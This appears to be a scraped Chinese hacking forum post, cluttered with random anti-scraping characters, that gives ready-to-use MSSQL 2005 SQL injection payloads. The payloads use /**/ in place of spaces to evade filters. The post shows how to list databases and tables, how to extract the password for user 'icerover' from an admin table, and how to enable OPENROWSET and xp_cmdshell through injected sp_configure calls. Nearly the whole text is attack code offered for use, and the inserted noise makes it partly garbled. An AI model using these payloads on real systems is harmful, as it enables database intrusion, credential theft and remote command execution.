2 [4 X' ?) N6 ^. Q+ t# q$ z
8 l. _, |: l" D9 U, m
" ?6 Q5 R3 ~0 i* A, I[Copy to clipboard]CODE:& l9 j/ P5 t. b: Z! o ^
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
" Y# P3 t( p+ P) a0 @; E9 n& {1 e/ `1 ?$ v9 I% ~0 U j( h! g
爆表语句,somedb部份是所要列的数据库,红色数字1累加$ A3 z0 c! A( E0 v
2 T4 N5 ^/ b# @4 x
7 Y: C7 B F) e1 R4 _; Z' y2 M[Copy to clipboard]CODE:! {& s. E, q! H% B( O3 J" R
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--. E" G' R& Q K3 P
; J/ o# T! B- @2 X爆字段语句,爆表admin里user='icerover'的密码段
1 a0 B; i e9 ~3 H9 u- s
/ s1 y B: q+ c/ w+ [7 r8 Z# j. s, i; f. N; ?1 `: j
[Copy to clipboard]CODE:
) F5 j. ?, i0 ~* B# s**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--. J# q# k. E8 v% ]4 i+ E& Z$ m
' P' b3 m1 A5 d9 E, a9 Tmssql2005默认没有开xp_cmdshell的,openrowset也不能用* u/ M8 D* G4 a( d- l! I0 s$ \
如果是sa权限,可以这样来开启
d9 P% y ^+ ^. S' U3 b开启openrowset+ D$ ?' e5 o/ N' a. G* ^' H
- v, v+ i5 O1 {: ^+ O* ?7 o3 F( b$ K' M1 W: z9 F. N/ k$ r& g
[Copy to clipboard]CODE:/ T$ c' C0 z# j; S, E* w
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
' G3 O8 z6 \5 [! ?. e; R/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--5 j) j; ^ C7 V! @; [/ Y
' |! s3 {: K& g* s开启xp_cmdshell5 b; K7 A+ m' \; y& h
7 Q9 F5 ?/ _( `1 k$ t9 J1 Q9 ]. t) R0 l. g1 U* y& ^# J' r
[Copy to clipboard]CODE:- _1 ]0 ]& Z4 L, V6 @; [
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
) y8 T3 a- {6 _6 M [EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
8 i7 l* N' Y* f; x6 U% O( ^* _) u, h _$ j5 G
ok,over~~晚安0 Q. @ C b1 X4 z6 E
|